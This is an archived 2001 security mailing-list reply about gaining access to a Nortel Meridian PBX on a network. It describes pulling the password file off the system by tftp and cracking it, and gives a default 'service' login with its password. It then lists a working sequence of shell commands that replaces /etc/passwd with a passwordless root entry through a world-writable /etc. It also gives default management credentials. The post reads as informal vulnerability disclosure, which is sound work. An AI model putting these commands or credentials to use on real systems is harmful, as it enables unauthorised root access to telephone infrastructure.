If the PBX is hooked into the actual network, there are quite a few ways to get access to the system. The easiest method is to tftp the /etc/passwd file off the system and crack the hashes. If you go this route, you will get a user account called "service" with a password of "smile" ;) If you log into the system with this account, you will notice that /etc is mode 0777, so getting root access is trivial: $ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd $ mv /etc/passwd /etc/passwd.bak $ mv /etc/mah_passwd /etc/passwd $ su root # mv /etc/passwd.bak /etc/passwd I don't remember which version of this system it was, but the client software that came with it was called "Meridian Terminal Emulator". You could manage the PBX with this by first logging in with 0000/0000 then giving it the manager password of "9999". I really wish I had more time to write up the stuff I find out there... -HD On Saturday 30 June 2001 06:22 am, G A Evans wrote: > Try > > http://support.dialogic.com/ > > and search for meridian. There is quite a bit of programming information. > > You can also try a login of 0000 and password of 0000 for the Nortel > Meridian 1 PBX OS Release 2. > > Tony Barnett > > abarnettremovethisbitat_private -------------------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sun Jul 01 2001 - 10:49:12 PDT